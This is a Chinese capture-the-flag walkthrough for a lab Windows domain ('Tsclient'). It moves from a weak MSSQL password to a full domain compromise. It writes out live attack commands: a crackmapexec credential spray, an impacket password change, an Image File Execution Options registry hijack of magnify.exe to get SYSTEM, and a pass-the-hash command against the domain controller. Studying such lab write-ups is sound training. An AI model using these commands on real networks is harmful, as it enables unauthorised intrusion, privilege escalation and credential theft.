春秋云镜-Tsclient

信息收集

先用fscan扫描一下看看有啥东西吗

数据库提权

扫描出来一个弱口令,我们用mdut登录下看看能不能提权

发现可以执行xpcmd

但是是mssql权限,考虑用哥甜土豆提权一下看看能不能成功

发现可以提权成功。来反弹个shell,这里学习下cs工具的使用

上线成功,来读取一波flag

内网渗透

收集下内网信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
   ___                              _    
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.3
start infoscan
(icmp) Target 172.22.8.18 is alive
(icmp) Target 172.22.8.15 is alive
(icmp) Target 172.22.8.31 is alive
(icmp) Target 172.22.8.46 is alive
[*] Icmp alive hosts len is: 4
172.22.8.15:88 open
172.22.8.46:445 open
172.22.8.18:1433 open
172.22.8.31:445 open
172.22.8.15:445 open
172.22.8.18:445 open
172.22.8.46:139 open
172.22.8.31:139 open
172.22.8.15:139 open
172.22.8.46:135 open
172.22.8.18:139 open
172.22.8.31:135 open
172.22.8.15:135 open
172.22.8.18:135 open
172.22.8.46:80 open
172.22.8.18:80 open
[*] alive ports len is: 16
start vulscan
[*] NetInfo
[*]172.22.8.46
[->]WIN2016
[->]172.22.8.46
[*] WebTitle http://172.22.8.18 code:200 len:703 title:IIS Windows Server
[*] NetInfo
[*]172.22.8.15
[->]DC01
[->]172.22.8.15
[*] NetInfo
[*]172.22.8.31
[->]WIN19-CLIENT
[->]172.22.8.31
[*] NetInfo
[*]172.22.8.18
[->]WIN-WEB
[->]172.22.8.18
[->]2001:0:348b:fb58:30f1:35e1:d89c:71e5
[*] NetBios 172.22.8.31 XIAORANG\WIN19-CLIENT
[*] NetBios 172.22.8.15 [+] DC:XIAORANG\DC01
[*] NetBios 172.22.8.46 WIN2016.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.8.46 code:200 len:703 title:IIS Windows Server
[+] mssql 172.22.8.18:1433:sa 1qaz!QAZ

发现有一个John用户,看看其在不在线。

1
shell quser || qwinst

发现是在线的。注入一下其进程

发现存在一个网络连接,读取一下其中的内容。

得到了一个用户名和密码,并且提示了一个 映像劫持,先记下来后面要用。

那我们拿着这个用户名和密码去遍历下看看谁能登录,先搭建个socks5代理方便后续渗透。

crackmapexec smb 172.22.8.0/24 -u 'Aldrich' -p 'Ald@rLMWuy7Z!#'

但是都不行,考虑用kali的rdesktop(因为可以更改密码)远程登录试试一个个尝试,最后发现172.22.8.46可以登录,但是要改一下密码。这里其实也可以参考其他师傅的思路就是用impacket 工具包更改下密码就行

python3 smbpasswd.py xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!#'@172.22.8.15 -newpass 'password'

之后换一个rdp工具kali有点ka也不知道为啥。

映像劫持

根据之前的提示有个映像劫持提权,咱们还是用cs学习他,因为这台机器不出网,但是在内网可以,所以就利用cs派生一个监听端口然后生成木马让其连接。

先查看下权限

1
get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *

这里我们发现所有正常登录的用户都可以修改注册表,利用这个性质,修改注册表映像劫持,使用放大镜进行提权,其实也就是把本来用户主页点放大镜启动的magnify.exe替换成C:\windows\system32\cmd.exe,这样就直接提权成system了

1
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

然后我们锁屏点击放大镜

提权成功,在从新运行下我们的马。

此时去获取第二个flag

接下来继续在收集信息

发现该机器账户在域管理员组里,那么我们就dump下hash

然后打一下pth直接拿下第三个flag

proxychains4 crackmapexec smb 172.22.8.15 -u WIN2016$ -H ffcdf594beeada0076fc2263cd7947f7 -d xiaorang -x "type C:\Users\Administrator\flag\flag03.txt"